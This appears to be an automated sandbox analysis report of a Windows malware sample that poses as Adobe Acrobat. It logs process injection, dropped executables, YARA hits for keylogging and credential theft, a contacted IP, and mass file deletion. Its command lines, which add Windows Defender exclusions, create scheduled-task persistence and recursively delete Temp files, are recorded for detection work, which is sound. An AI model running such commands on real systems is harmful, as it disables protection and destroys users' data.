NtAllocateVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00447000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01106000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01106000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01030000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01030000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01030000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01032000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010f3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010f3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010f3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010f3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010f3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010f3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010f3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010f3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010f3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010f3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010f3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010f3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010f3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010f3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010f3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010f3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010f3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010f3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010f3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010f3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010f3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010f3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010f3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010f3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010f3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010f3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010f3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2021, 9:43 a.m.	process_identifier: 2236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010f3000 process_handle: 0xffffffff	1

Looks up the external IP address (1 event)

domain

ip-api.com

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (9 events)

cmdline	schtasks.exe /Create /TN "Updates\kCCzCqEnSxl" /XML "C:\Users\test22\AppData\Local\Temp\tmpF95D.tmp"
cmdline	powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ski.exe"
cmdline	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kCCzCqEnSxl" /XML "C:\Users\test22\AppData\Local\Temp\tmpF95D.tmp"
cmdline	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kCCzCqEnSxl" /XML "C:\Users\test22\AppData\Local\Temp\tmp220E.tmp"
cmdline	powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\SubDir\winrara.exe"
cmdline	schtasks.exe /Create /TN "Updates\kCCzCqEnSxl" /XML "C:\Users\test22\AppData\Local\Temp\tmp220E.tmp"
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ski.exe"
cmdline	C:\Windows\system32\cmd.exe /K del /q/f/s C:\Users\test22\AppData\Local\Temp\*
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\SubDir\winrara.exe"

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\ski.exe

Drops an executable to the user AppData folder (9 events)

file	C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe
file	C:\Users\test22\AppData\Local\Temp\G2BWinJNI.dll
file	C:\Users\test22\AppData\Local\Temp\202005191702_6d173b9549ce4fe1e5ada5ab9ce0bfff5d9569f19e7fa916db5c8d4f0dace63b_setup_nwc275a_demo.exe
file	C:\Users\test22\AppData\Local\Temp\ski.exe
file	C:\Users\test22\AppData\Local\Temp\Setup000023ac\OSETUP.DLL
file	C:\Users\test22\AppData\Local\Temp\jna--877171118\jna4115874404283386990.dll
file	C:\Users\test22\AppData\Local\Temp\Setup000023ac\ose00000.exe
file	C:\Users\test22\AppData\Local\Temp\Setup000023ac\OSETUPUI.DLL
file	C:\Users\test22\AppData\Local\Temp\g2bInfo.dll

A process created a hidden window (4 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Oct. 19, 2021, 9:44 a.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ski.exe" filepath: powershell	1	1
ShellExecuteExW Oct. 19, 2021, 9:44 a.m.	show_type: 0 filepath_r: schtasks.exe parameters: /Create /TN "Updates\kCCzCqEnSxl" /XML "C:\Users\test22\AppData\Local\Temp\tmpF95D.tmp" filepath: schtasks.exe	1	1
ShellExecuteExW Oct. 19, 2021, 9:56 a.m.	show_type: 0 filepath_r: powershell parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\SubDir\winrara.exe" filepath: powershell	1	1
ShellExecuteExW Oct. 19, 2021, 9:56 a.m.	show_type: 0 filepath_r: schtasks.exe parameters: /Create /TN "Updates\kCCzCqEnSxl" /XML "C:\Users\test22\AppData\Local\Temp\tmp220E.tmp" filepath: schtasks.exe	1	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x000d4600', u'virtual_address': u'0x00002000', u'entropy': 7.832878999007145, u'name': u'.text', u'virtual_size': u'0x000d4404'}

entropy

7.83287899901

description

A section with a high entropy has been found

entropy

0.986643437863

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (5 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Oct. 19, 2021, 9:44 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 19, 2021, 9:54 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 19, 2021, 9:56 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 19, 2021, 9:55 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 19, 2021, 9:56 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (50 out of 88 events)

description	Communications use DNS	rule	Network_DNS
description	Record Audio	rule	Sniff_Audio
description	Run a KeyLogger	rule	KeyLogger
description	task schedule	rule	schtasks_Zero
description	Take ScreenShot	rule	ScreenShot
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Steal credential	rule	local_credential_Steal
description	Communications use DNS	rule	Network_DNS
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over FTP	rule	Network_FTP
description	Escalate priviledges	rule	Escalate_priviledges
description	File Downloader	rule	Network_Downloader
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Communications use DNS	rule	Network_DNS
description	Record Audio	rule	Sniff_Audio
description	Run a KeyLogger	rule	KeyLogger
description	task schedule	rule	schtasks_Zero
description	Take ScreenShot	rule	ScreenShot
description	(no description)	rule	DebuggerCheck__GlobalFlags

Terminates another process (2 events)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess Oct. 19, 2021, 9:56 a.m.	status_code: 0xffffffff process_identifier: 2620 process_handle: 0x000003b0		0	0
NtTerminateProcess Oct. 19, 2021, 9:56 a.m.	status_code: 0xffffffff process_identifier: 2620 process_handle: 0x000003b0	1	0	0

Uses Windows utilities for basic Windows functionality (7 events)

cmdline	schtasks.exe /Create /TN "Updates\kCCzCqEnSxl" /XML "C:\Users\test22\AppData\Local\Temp\tmpF95D.tmp"
cmdline	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kCCzCqEnSxl" /XML "C:\Users\test22\AppData\Local\Temp\tmpF95D.tmp"
cmdline	chcp 65001
cmdline	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kCCzCqEnSxl" /XML "C:\Users\test22\AppData\Local\Temp\tmp220E.tmp"
cmdline	schtasks.exe /Create /TN "Updates\kCCzCqEnSxl" /XML "C:\Users\test22\AppData\Local\Temp\tmp220E.tmp"
cmdline	C:\Windows\system32\cmd.exe /K del /q/f/s C:\Users\test22\AppData\Local\Temp\*
cmdline	ping -n 10 localhost

Communicates with host for which no DNS query was performed (1 event)

host

91.134.207.16

Allocates execute permission to another process indicative of possible code injection (3 events)

Time & API	Arguments	Status	Return
NtAllocateVirtualMemory Oct. 19, 2021, 9:44 a.m.	process_identifier: 1580 region_size: 573440 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000003a0	1	0
NtAllocateVirtualMemory Oct. 19, 2021, 9:56 a.m.	process_identifier: 2620 region_size: 573440 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000003a8		3221225496
NtAllocateVirtualMemory Oct. 19, 2021, 9:56 a.m.	process_identifier: 2504 region_size: 573440 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000003d0	1	0

Attempts to identify installed AV products by installation directory (1 event)

file	C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe

Manipulates memory of a non-child process indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2236 manipulating memory of non-child process 1580
Process injection	Process 1080 manipulating memory of non-child process 2620
NtAllocateVirtualMemory Oct. 19, 2021, 9:44 a.m.	process_identifier: 1580 region_size: 573440 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000003a0	1	0	0
NtAllocateVirtualMemory Oct. 19, 2021, 9:56 a.m.	process_identifier: 2620 region_size: 573440 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000003a8		3221225496	0

Potential code injection by writing to the memory of another process (9 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2236 injected into non-child 1580
WriteProcessMemory Oct. 19, 2021, 9:44 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELnGaàNl @ À@ÈkS H.text$L N `.rsrc P@@.reloc Z@B base_address: 0x00400000 process_identifier: 1580 process_handle: 0x000003a0	1	1	0
WriteProcessMemory Oct. 19, 2021, 9:44 a.m.	buffer: 8Ph èäxäè4VS_VERSION_INFO½ïþ ?DVarFileInfo$Translation°HStringFileInfo$000004b0CommentsHCompanyNameAdobe Systems, Inc.TFileDescriptionAdobe Acrobat XIV Pro4 FileVersion13.10.3.2LInternalNameAdobe Acrobat XIV Prol$LegalCopyrightCopyright © 2013 Adobe Systems Inc.TLegalTrademarksAdobe Acrobat XIV ProTOriginalFilenameAdobe Acrobat XIV ProLProductNameAdobe Acrobat XIV Pro8 ProductVersion13.10.3.2< Assembly Version13.10.3.2ï»¿<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges> <requestedExecutionLevel level="asInvoker" uiAccess="false" /> </requestedPrivileges> </security> </trustInfo> <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> <application> <!-- Windows Vista --> <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> <!-- Windows 7 --> <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> <!-- Windows 8 --> <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/> <!-- Windows 8.1 --> <supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/> <!-- Windows 10 --> <supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/> </application> </compatibility> <asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" > <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings"> <dpiAware>true</dpiAware> </asmv3:windowsSettings> </asmv3:application> </assembly>PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING base_address: 0x00488000 process_identifier: 1580 process_handle: 0x000003a0	1	1	0
WriteProcessMemory Oct. 19, 2021, 9:44 a.m.	buffer: ` < base_address: 0x0048a000 process_identifier: 1580 process_handle: 0x000003a0	1	1	0
WriteProcessMemory Oct. 19, 2021, 9:44 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 1580 process_handle: 0x000003a0	1	1	0
WriteProcessMemory Oct. 19, 2021, 9:56 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELnGaàNl @ À@ÈkS H.text$L N `.rsrc P@@.reloc Z@B base_address: 0x00400000 process_identifier: 2504 process_handle: 0x000003d0	1	1	0
WriteProcessMemory Oct. 19, 2021, 9:56 a.m.	buffer: 8Ph èäxäè4VS_VERSION_INFO½ïþ ?DVarFileInfo$Translation°HStringFileInfo$000004b0CommentsHCompanyNameAdobe Systems, Inc.TFileDescriptionAdobe Acrobat XIV Pro4 FileVersion13.10.3.2LInternalNameAdobe Acrobat XIV Prol$LegalCopyrightCopyright © 2013 Adobe Systems Inc.TLegalTrademarksAdobe Acrobat XIV ProTOriginalFilenameAdobe Acrobat XIV ProLProductNameAdobe Acrobat XIV Pro8 ProductVersion13.10.3.2< Assembly Version13.10.3.2ï»¿<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges> <requestedExecutionLevel level="asInvoker" uiAccess="false" /> </requestedPrivileges> </security> </trustInfo> <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> <application> <!-- Windows Vista --> <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> <!-- Windows 7 --> <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> <!-- Windows 8 --> <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/> <!-- Windows 8.1 --> <supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/> <!-- Windows 10 --> <supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/> </application> </compatibility> <asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" > <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings"> <dpiAware>true</dpiAware> </asmv3:windowsSettings> </asmv3:application> </assembly>PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING base_address: 0x00488000 process_identifier: 2504 process_handle: 0x000003d0	1	1	0
WriteProcessMemory Oct. 19, 2021, 9:56 a.m.	buffer: ` < base_address: 0x0048a000 process_identifier: 2504 process_handle: 0x000003d0	1	1	0
WriteProcessMemory Oct. 19, 2021, 9:56 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2504 process_handle: 0x000003d0	1	1	0

Code injection by writing an executable or DLL to the memory of another process (3 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2236 injected into non-child 1580
WriteProcessMemory Oct. 19, 2021, 9:44 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELnGaàNl @ À@ÈkS H.text$L N `.rsrc P@@.reloc Z@B base_address: 0x00400000 process_identifier: 1580 process_handle: 0x000003a0	1	1	0
WriteProcessMemory Oct. 19, 2021, 9:56 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELnGaàNl @ À@ÈkS H.text$L N `.rsrc P@@.reloc Z@B base_address: 0x00400000 process_identifier: 2504 process_handle: 0x000003d0	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2236 called NtSetContextThread to modify thread in remote process 1580
Process injection	Process 1080 called NtSetContextThread to modify thread in remote process 2504
NtSetContextThread Oct. 19, 2021, 9:44 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4746270 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000398 process_identifier: 1580	1	0	0
NtSetContextThread Oct. 19, 2021, 9:56 a.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4746270 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000003b0 process_identifier: 2504	1	0	0

Deletes a large number of files from the system indicative of ransomware, wiper malware or system destruction (50 out of 133 events)

file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.456.20989093
file	C:\Users\test22\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.456.20989093
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.456.20989093
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2928.21064531
file	C:\Users\test22\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2928.21064531
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1416b24.TMP
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2928.21064531
file	C:\Users\test22\AppData\Local\Temp\tmpF95D.tmp
file	C:\Users\test22\AppData\Local\Temp\IItpH4jzjf3i.bat
file	C:\Users\test22\AppData\Local\Temp\tmp220E.tmp
file	C:\Users\test22\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1648.21034953
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF140f79a.TMP
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.1648.21034953
file	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.1648.21034953
file	C:\Users\test22\AppData\Local\Temp\SetupExe(20200504224110B04).log
file	C:\Users\test22\AppData\Local\Temp\ArmUI.ini
file	C:\Users\test22\AppData\Local\Temp\java_install_reg.log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000011.log
file	C:\Users\test22\AppData\Local\Temp\dd_dotnet4.5_decompression_log.txt
file	C:\Users\test22\AppData\Local\Temp\dd_dotNetFx45LP_Full_x86_x64ko_decompression_log.txt
file	C:\Users\test22\AppData\Local\Temp\AdobeARM.log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000001.log
file	C:\Users\test22\AppData\Local\Temp\jna--877171118\jna4115874404283386990.dll.x
file	C:\Users\test22\AppData\Local\Temp\jawshtml.html
file	C:\Users\test22\AppData\Local\Temp\~DFB8537D6963ECB123.TMP
file	C:\Users\test22\AppData\Local\Temp\ASPNETSetup_00000.log
file	C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548_000_vcRuntimeMinimum_x64.log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000013.log
file	C:\Users\test22\AppData\Local\Temp\FXSAPIDebugLogFile.txt
file	C:\Users\test22\AppData\Local\Temp\dd_SetupUtility.txt
file	C:\Users\test22\AppData\Local\Temp\ASPNETSetup_00001.log
